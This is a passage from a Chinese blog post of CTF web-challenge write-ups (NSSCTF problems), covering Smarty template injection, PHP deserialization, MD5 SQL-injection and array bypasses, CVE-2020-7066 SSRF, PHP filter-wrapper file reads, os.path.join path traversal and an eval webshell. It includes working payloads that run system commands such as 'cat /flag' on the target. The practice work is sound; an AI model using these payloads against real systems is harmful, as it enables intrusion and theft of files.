<p>&emsp;&emsp;根据页面中所给信息，此题考查的是Smarty类型，根据所给表格，猜测IP的查询通过信息头<code>X-Forwarded-For</code>控制，尝试使用BurpSuite抓包，添加该信息头</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/5_XFF%E5%B0%9D%E8%AF%95.png" title="5_XFF尝试"></p>
<p>&emsp;&emsp;很显然，方向对了，反复进行尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">X-Forwarded-For: a&#123;system(&quot;ls /&quot;)&#125;b              =&gt; 发现flag</span><br><span class="line">X-Forwarded-For: a&#123;system(&quot;ls /flag&quot;)&#125;b          =&gt; /flag</span><br><span class="line">X-Forwarded-For: a&#123;system(&quot;cat /flag&quot;)&#125;b         =&gt; NSSCTF&#123;0d0fec23-e1e1-458a-8c42-b0b3883e1bc0&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;结果展示如下</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/5_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="5_结果展示"></p>
<h2><span id="2899_hnctf-2022-week1easy_html">2899_[HNCTF 2022 Week1]easy_html</span></h2><p>&emsp;&emsp;进入环境，查看网页源代码，无果，<code>curl -v</code>后发现信息</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2899_curl%E7%BB%93%E6%9E%9C.png" title="2899_curl结果"></p>
<p>&emsp;&emsp;进入<code>./flag.php</code>，随便输了个1，返回no，查看BurpSuite抓包信息</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2899_Bp%E6%8A%93%E5%8C%85.png" title="2899_Bp抓包"></p>
<p>&emsp;&emsp;就找到这么个信息，尝试输入11位手机号(才发现有暗示)，得到flag，无形中绕过了HTML页面中方框写入字符长度的限制( ͡°ᴥ ͡° ʋ)</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2899_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="2899_结果展示"></p>
<h2><span id="2883_swpuctf-2022-新生赛1z_unserialize-反序列化">2883_[SWPUCTF 2022 新生赛]1z_unserialize –反序列化</span></h2><p>&emsp;&emsp;进入环境，得到PHP代码，发现关键字<code>unserialize</code>和关键魔术方法<code>_destruct()</code>，显而易见，只需要构造一个对象序列化字符串，使用POST方式传参即可，无其他限制</p>
<p>&emsp;&emsp;审计代码发现，命令执行函数<code>system(~~~)</code>的结构符合题意，于是构造序列化字符尝试(原理见题426，方法见题440，在<code>1~50</code>合集中)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// system(&quot;ls&quot;)</span></span><br><span class="line">nss=O:<span class="number">3</span>:<span class="string">&quot;lyh&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;url&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;NSSCTF.com&quot;</span>;s:<span class="number">2</span>:<span class="string">&quot;lt&quot;</span>;s:<span class="number">6</span>:<span class="string">&quot;system&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;lly&quot;</span>;s:<span class="number">2</span>:<span class="string">&quot;ls&quot;</span>;&#125;</span><br><span class="line">=&gt; index.php</span><br><span class="line"><span class="comment">// system(&quot;ls /&quot;)</span></span><br><span class="line">nss=O:<span class="number">3</span>:<span class="string">&quot;lyh&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;url&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;NSSCTF.com&quot;</span>;s:<span class="number">2</span>:<span class="string">&quot;lt&quot;</span>;s:<span class="number">6</span>:<span class="string">&quot;system&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;lly&quot;</span>;s:<span class="number">4</span>:<span class="string">&quot;ls /&quot;</span>;&#125;</span><br><span class="line">=&gt; bin boot dev etc flag home lib lib64 media mnt opt proc root run run.sh sbin srv sys tmp usr <span class="keyword">var</span></span><br><span class="line"><span class="comment">// system(&quot;ls /flag&quot;)</span></span><br><span class="line">nss=O:<span class="number">3</span>:<span class="string">&quot;lyh&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;url&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;NSSCTF.com&quot;</span>;s:<span class="number">2</span>:<span class="string">&quot;lt&quot;</span>;s:<span class="number">6</span>:<span class="string">&quot;system&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;lly&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;ls /flag&quot;</span>;&#125;</span><br><span class="line">=&gt; /flag</span><br><span class="line"><span class="comment">// system(&quot;cat /flag&quot;)</span></span><br><span class="line">nss=O:<span class="number">3</span>:<span class="string">&quot;lyh&quot;</span>:<span class="number">3</span>:&#123;s:<span class="number">3</span>:<span class="string">&quot;url&quot;</span>;s:<span class="number">10</span>:<span class="string">&quot;NSSCTF.com&quot;</span>;s:<span class="number">2</span>:<span class="string">&quot;lt&quot;</span>;s:<span class="number">6</span>:<span class="string">&quot;system&quot;</span>;s:<span class="number">3</span>:<span class="string">&quot;lly&quot;</span>;s:<span class="number">9</span>:<span class="string">&quot;cat /flag&quot;</span>;&#125;</span><br><span class="line">=&gt; NSSCTF&#123;<span class="number">8361</span>a415-<span class="number">7626</span>-<span class="number">478</span>e-be9c-c205f840eaa8&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;结算画面如下</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2883_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="2883_结果展示"></p>
<h2><span id="2638_swpuctf-2022-新生赛奇妙的md5-sql注入-md5-数组绕过-ffifdyop绕过">2638_[SWPUCTF 2022 新生赛]奇妙的MD5 –SQL注入 –MD5 –数组绕过 –ffifdyop绕过</span></h2><p>&emsp;&emsp;进入环境，没看懂提示，老规矩试了网页源代码、Curl+V和目录扫描，源代码无关键信息，目录扫描的<code>./flag.php</code>为空白页，Curl+V有关键信息如下</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_HTTP%E5%A4%B4%E5%B1%95%E7%A4%BA.png" title="2638_HTTP头展示"></p>
<p>&emsp;&emsp;尝试输入字符串，使该行的右式恒为True，于是搜索等号右边的函数有无方法实现恒为真，得到信息如下</p>
<p>&emsp;&emsp;在PHP中，<code>md5()</code>函数默认将结果以<span style="background-color: yellow;">32位的十六进制字符串</span>(128位二进制，4位一次分割，一段一个字符)形式返回，而添加<code>true</code>参数后，将以<span style="background-color: yellow;">16个字节的二进制字符串</span>(128位二进制，8位一次分割，一段一个字符)形式返回</p>
<p>&emsp;&emsp;于是只需要使返回的16个字符满足如“~~or非零值”的格式即可，可是我不会，网上大佬流传字符串<span style="background-color: yellow;">ffifdyop</span>，可转化为”空or6xx“，可作为结论牢记</p>
<p>&emsp;&emsp;输入后查看网页源代码，得到信息</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_%E6%BA%90%E7%A0%81%E5%B1%95%E7%A4%BA.png" title="2638_源码展示"></p>
<p>&emsp;&emsp;知晓为MD5码的弱比较知识点，故使用数组绕过，原理见题386(在<code>1~50</code>合集中)，构造x、y如下：<code>?x[]=12&amp;y[]=123</code>，得到下一步的PHP代码</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_PHP.png" title="2638_PHP"></p>
<p>&emsp;&emsp;仍然可以使用数组绕过方法，使用HackBar进行POST传参，得到flag</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2638_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="2638_结果展示"></p>
<h2><span id="2035_nisactf-2022checkin">2035_[NISACTF 2022]checkin</span></h2><p>&emsp;&emsp;进入环境，照例进行查看网页源代码和Curl+V，发现Curl+V中的内容出现了一些显示不出来的字符，复制下来放到Notepad++里看，没有用</p>
<p>&emsp;&emsp;实在搞不出来，看了WriteUp，这是Web？此题不做多述</p>
<h2><span id="1300_gkctf-2020cve版签到-cve-2020-7066-ssrf">1300_[GKCTF 2020]cve版签到 –cve-2020-7066 –SSRF</span></h2><p>&emsp;&emsp;进入环境，没明白意思，又是新的知识点，还是先看网页源代码和Curl+V，没有用，在F12的Network中看看回复信息，发现Hint信息头，指示要访问本地，也就是<code>127.0.0.1</code>，开头还在ctfhub.com前面加了<code>*</code>号</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_%E7%BA%BF%E7%B4%A2%E5%B1%95%E7%A4%BA.png" title="1300_线索展示"></p>
<p>&emsp;&emsp;可惜还是不知道怎么做，去看了WriteUp，发现题目也给了提示是<code>cve-2020-7066</code>漏洞，查查看</p>
<table>
<thead>
<tr>
<th align="center">CVE-2020-7066使用要求</th>
<th align="center">解释</th>
</tr>
</thead>
<tbody><tr>
<td align="center">版本</td>
<td align="center">PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本</td>
</tr>
<tr>
<td align="center">函数<code>get_headers()</code></td>
<td align="center">接受一个网址，返回某服务器对该网址HTTP 请求的回复，为一个数组，每个信息头为其中一个元素</td>
</tr>
<tr>
<td align="center">零字符<code>\0</code></td>
<td align="center">get_headers()接受URL时，如果URL包含零（\ 0）字符，则URL将被截断</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;那我大概知道了，这就是在原网址位置前加上127.0.0.1+零字符的URL编码就行了嘛，试试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/?url=http://127.0.0.1%00ctfhub.com                    =&gt; 错误</span><br><span class="line">/?url=http://127.0.0.1%00http://www.ctfhub.com         =&gt; 错误</span><br><span class="line">/?url=http://127.0.0.1%00www.ctfhub.com                =&gt; 正确</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;很疑惑，前两个为什么不对呢？有待解决。刷新后返回的信息头给出新的要求</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_%E6%96%B0%E8%A6%81%E6%B1%82.png" title="1300_新要求"></p>
<p>&emsp;&emsp;修改URL后得到flag</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="1300_结果展示"></p>
<p>&emsp;&emsp;在WriteUp中，还提及了另一个新词汇，叫SSRF，查询得以下信息，以供后续使用</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1300_SSRF%E7%AE%80%E4%BB%8B.png" title="1300_SSRF简介"></p>
<p>&emsp;&emsp;SSRF就是发生于“服务器对用户提供的可控、恶意URL过于信任导致的以此为跳板攻击内网或者其它服务器”的一种漏洞，一般是其firewall的URL限制出现漏洞导致的</p>
<h2><span id="1421_羊城杯-2020easycon-eval函数通用格式-base64转图片特征">1421_[羊城杯 2020]easycon –eval()函数通用格式 –base64转图片特征</span></h2><p>&emsp;&emsp;进入环境，报错页面给了我在Apache2搭建服务器的结构，告诉我搭建时的初始化操作，先不管，先试网页源代码、Curl+V、F12Network和目录扫描，搜出来存在<code>./index.php</code>，进入</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1421_index.png" title="1421_index"></p>
<p>&emsp;&emsp;给出了eval、post和cmd三个词，分别对应PHP的命令执行函数、HTTP的请求方式和Windows的cmd.exe，观察以前见过的eval()函数，基本为<code>eval($_~~~[&#39;~~~&#39;])</code>的形式，故猜测提示想告诉我们此PHP代码中应有语句：<code>eval($_POST[&#39;cmd&#39;])</code>，尝试</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1421_%E5%B0%9D%E8%AF%95.png" title="1421_尝试"></p>
<p>&emsp;&emsp;访问关键文件<code>bbbbbbbbb.txt</code>，得到一堆base64编码的字符串，解出来是一堆乱码，又不知道怎么办了，去看了WriteUp，说是要把base64编码转成图片，直接使用WriteUp里提供的在线转换网站，得到flag</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/1421_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="1421_结果展示"></p>
<p>&emsp;&emsp;此题总结、学习如下：</p>
<p>&emsp;&emsp;base64编码转图片的特征：开头为<code>/9j/</code>或译码后开头出现<code>JFJF</code>字段</p>
<p>&emsp;&emsp;中国蚁剑的使用：？？？太好用了叭（〃｀ 3′〃）</p>
<p>&emsp;&emsp;这真的是Web题？？？o(￣┰￣*)ゞ</p>
<h2><span id="3082_swpuctf-2022-新生赛ez_ez_unserialize-反序列化-__file__属性-__wakeup绕过">3082_[SWPUCTF 2022 新生赛]ez_ez_unserialize –反序列化 –<code>__FILE__</code>属性 –<code>__wakeup()绕过</code></span></h2><p>&emsp;&emsp;进入环境得到PHP代码，审计关键代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">X</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="comment">// 新知识，未知</span></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$x</span> = <span class="keyword">__FILE__</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$x</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;x = <span class="variable">$x</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 题429(1~50)有讲，分析可知，需要绕过该函数</span></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;x !== <span class="keyword">__FILE__</span>) &#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;x = <span class="keyword">__FILE__</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 即要求，在类实例销毁的时候，变量x储存为fllllllag.php</span></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">highlight_file</span>(<span class="variable">$this</span>-&gt;x);</span><br><span class="line">        <span class="comment">//flag is in fllllllag.php</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 输入：x = 序列化字符串，$_REQUEST方法表示该变量可由任意方式请求(GET、POST、COOKIE)</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;x&#x27;</span>])) &#123;</span><br><span class="line">    @<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;x&#x27;</span>]);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;先来学习一下新的知识点，<code>__FILE__</code></p>
<p>&emsp;&emsp;<code>__FILE__</code>：是一个魔术常量，它在运行时被替换为包含当前执行文件的完整路径和文件名的字符串</p>
<p>&emsp;&emsp;比如，当运行的文件位于<code>/users/admin/CTF/test/</code>目录中，文件名为<code>index.php</code>时，<code>__FILE__</code>为<code>/users/admin/CTF/test/index.php</code></p>
<p>&emsp;&emsp;于是，此题仅需使变量x被序列化字符赋值为<code>fllllllag.php</code>，且绕过<code>__wakeup()</code>魔术方法，即可获取下一层信息，此处不再提及反序列化字串的构建方法，直接给出：<code>O:1:&quot;X&quot;:1:&#123;s:1:&quot;x&quot;;s:13:&quot;fllllllag.php&quot;;&#125;</code></p>
<p>&emsp;&emsp;由于还需要对魔术方法进行绕过，故修改其类中属性的数量，输入得到flag</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3082_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="3082_结果展示"></p>
<h2><span id="2025_nisactf-2022babyupload-文件上传-访问url下载压缩包-ospathjoin函数特性">2025_[NISACTF 2022]babyupload –文件上传 –访问URL下载压缩包 –os.path.join()函数特性</span></h2><p>&emsp;&emsp;进入环境，很明显是文件上传知识点，回顾423&#x2F;388&#x2F;436题知识点，先上传一个一句话木马的.php文件试试水</p>
<p>&emsp;&emsp;好吧，显示“Bad filename!”，根据反馈，猜测是文件名需要绕过，反复尝试，出现线索</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">// 此为尝试的文件名：test.phtml/test.jpg/test.txt/file.jpg/file.txt/1.txt/，q正确</span><br></pre></td></tr></table></figure>

<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2025_%E6%96%87%E4%BB%B6%E5%90%8D%E7%BB%95%E8%BF%87.png" title="2025_文件名绕过"></p>
<p>&emsp;&emsp;进入URL，发现为空白，但在F12检查中，发现出现了.php文件中的代码，在网页源代码处同样发现<code>&lt;?php @eval(system(&quot;pwd&quot;);?&gt;</code></p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2025_%E4%B8%8B%E4%B8%80%E7%BA%BF%E7%B4%A2.png" title="2025_下一线索"></p>
<p>&emsp;&emsp;多尝试一下，还是<code>&lt;!--?php ~~~~~?--&gt;</code>格式的注释，且代码虽没有在前添加注释符，仍无法运行，去看WriteUp</p>
<p>&emsp;&emsp;好吧，开头就错了，应该根据最开始的绿色注释提醒，访问URL<code>/source</code>，得到一个压缩包，审计其内关键Python代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="comment"># 初始化界面</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hello_world</span>():</span><br><span class="line">    <span class="keyword">return</span> ~~~</span><br><span class="line"></span><br><span class="line"><span class="comment"># 压缩包下载路径</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/source&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">source</span>():</span><br><span class="line">    <span class="keyword">return</span> send_from_directory(directory=<span class="string">&quot;/var/www/html/&quot;</span>, path=<span class="string">&quot;www.zip&quot;</span>, as_attachment=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 文件上传路径，储存文件内容至数据库，并生成专用的文件ID</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/upload&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upload</span>():</span><br><span class="line">    ~~~</span><br><span class="line">    <span class="keyword">return</span> redirect(<span class="string">&#x27;/file/&#x27;</span> + uid)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 根据/file/&lt;id&gt;中的id，翻译出文件名，利用os.path.join()函数拼接路径，查询upload/文件名</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/file/&lt;id&gt;&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">file</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">    conn = db()</span><br><span class="line">    cur = conn.cursor()</span><br><span class="line">    cur.execute(<span class="string">&quot;select path from files where id=?&quot;</span>, (<span class="built_in">id</span>,))</span><br><span class="line">    res = cur.fetchone()</span><br><span class="line">    <span class="keyword">if</span> res <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;File not found&quot;</span>, <span class="number">404</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># print(res[0])</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(<span class="string">&quot;uploads/&quot;</span>, res[<span class="number">0</span>]), <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">return</span> f.read()</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;os.path.join()函数的特性是这道题解题关键：如果拼接的某个路径以 &#x2F; 开头，那么包括基础路径在内的所有前缀路径都将被删除，该路径将视为绝对路径</p>
<p>&emsp;&emsp;则当<code>res[0] = /flag</code>时，<code>upload/</code>会被删除，程序将直接访问无法外部访问的flag文件，得到flag</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2025_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="2025_结果展示"></p>
<h2><span id="3345_moectf-2022baby_file-php伪协议-文件包含漏洞">3345_[MoeCTF 2022]baby_file –PHP伪协议 –文件包含漏洞</span></h2><p>&emsp;&emsp;进入环境，它让我找秘密，F12、网页源代码、Curl+V都没有线索</p>
<p>&emsp;&emsp;目录扫描发现，代码对<code>/~</code>后的URL进行重定向，返回原页面；若其后跟的是文件，则被拦截</p>
<p>&emsp;&emsp;故尝试PHP伪协议直接读取文件：&#x2F;?file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/3345_%E4%BC%AA%E5%8D%8F%E8%AE%AE%E8%AF%BB%E5%8F%96.png" title="3345_伪协议读取"></p>
<p>&emsp;&emsp;翻译此bae64编码即得到flag</p>
<h2><span id="2896_hnctf-2022-week1what-is-web">2896_[HNCTF 2022 Week1]What is Web</span></h2><p>&emsp;&emsp;进入环境，拜读了整篇文章，很轻松就找到提醒了(人真好啊)，猜测是HTML页面中加入了注释语句</p>
<p><img src="/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(51~100)/2896_%E7%BB%93%E6%9E%9C%E5%B1%95%E7%A4%BA.png" title="2896_结果展示"></p>
<p>&emsp;&emsp;果然，得到flag</p>
<h2><span id="1852_nisactf-2022babyserialize-反序列化-魔术方法触发条件总结-不可访问情形总结">1852_[NISACTF 2022]babyserialize –反序列化 –魔术方法触发条件总结 –不可访问情形总结</span></h2><p>&emsp;&emsp;进入环境得到一大串PHP代码，首先看看代码中所用的魔术方法的触发条件</p>
<table>
<thead>
<tr>
<th align="center">魔术方法</th>
<th align="center">调用条件</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><code>__wakeup()</code></td>
<td align="center">使用 <code>unserialize()</code> 恢复对象时自动调用</td>
</tr>
<tr>
<td align="center"><code>__call($name, $arguments)</code></td>
<td align="center">在对象上调用一个不可访问的方法时自动调用。<code>$name</code> 是方法名，<code>$arguments</code> 是参数数组</td>
</tr>
<tr>
<td align="center"><code>__toString()</code></td>
<td align="center">当尝试将对象当作字符串使用时自动调用。例如，使用 <code>echo</code> 输出对象或将对象与字符串连接</td>
</tr>
<tr>
<td align="center"><code>__invoke()</code></td>
<td align="center">当尝试以函数方式调用一个对象时自动调用</td>
</tr>
<tr>
<td align="center"><code>__set($name, $value)</code></td>
<td align="center">当给对象的一个不可访问属性赋值时自动调用。<code>$name</code> 是属性名，<code>$value</code> 是要赋的值</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;其中，不可访问的情形有以下几种</p>
<table>
<thead>
<tr>
<th align="center">不可访问情形</th>
<th align="center">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="center">属性或方法不存在</td>
<td align="center">尝试访问对象中不存在的属性或方法，将触发 <code>__get()</code>（针对属性）或 <code>__call()</code>（针对方法）魔术方法（如果定义了这些方法）。</td>
</tr>
<tr>
<td align="center">权限不足（访问修饰符限制）</td>
<td align="center">对象的属性或方法由于 <code>private</code>、<code>protected</code> 访问修饰符的限制而无法从外部直接访问。尝试访问时，如果定义了相应的魔术方法（如 <code>__get()</code> 对于属性），则可能会触发这些方法。</td>
</tr>
<tr>
<td align="center">静态方法与实例方法混淆</td>
<td align="center">尝试通过对象实例调用静态方法（或通过类名调用实例方法），虽然这通常会导致直接错误，但相关的魔术方法（如 <code>__callStatic()</code>）在处理这种不可访问的静态方法调用时可能会被定义和触发。</td>
</tr>
<tr>
<td align="center">序列化与反序列化中的不可访问</td>
<td align="center">在序列化过程中，某些属性或方法可能由于包含不可序列化的数据而被标记为不可访问。在反序列化时，如果尝试恢复这些属性或方法，并且定义了 <code>__wakeup()</code> 魔术方法，则该方法可能会被触发。</td>
</tr>
<tr>
<td align="center">对象类型与期望不符（类型错误）</td>
<td align="center">传递给方法或函数的对象类型不符合期望的类型或接口。虽然这不会直接触发魔术方法，但开发者可能会利用魔术方法（如 <code>__call()</code>）来提供回退或兼容行为，以处理类型错误的情况（尽管这不是魔术方法的直接用途）。</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;接着来分析几个类之间的关系</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF-Web/" rel="tag"># CTF-Web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/11/07/NSSCTF-Web%E5%81%9A%E9%A2%98%E7%AC%94%E8%AE%B0(1~50)/" rel="prev" title="NSSCTF-Web做题笔记(1~50)">
                  <i class="fa fa-angle-left"></i> NSSCTF-Web做题笔记(1~50)
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">作者：陈展</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

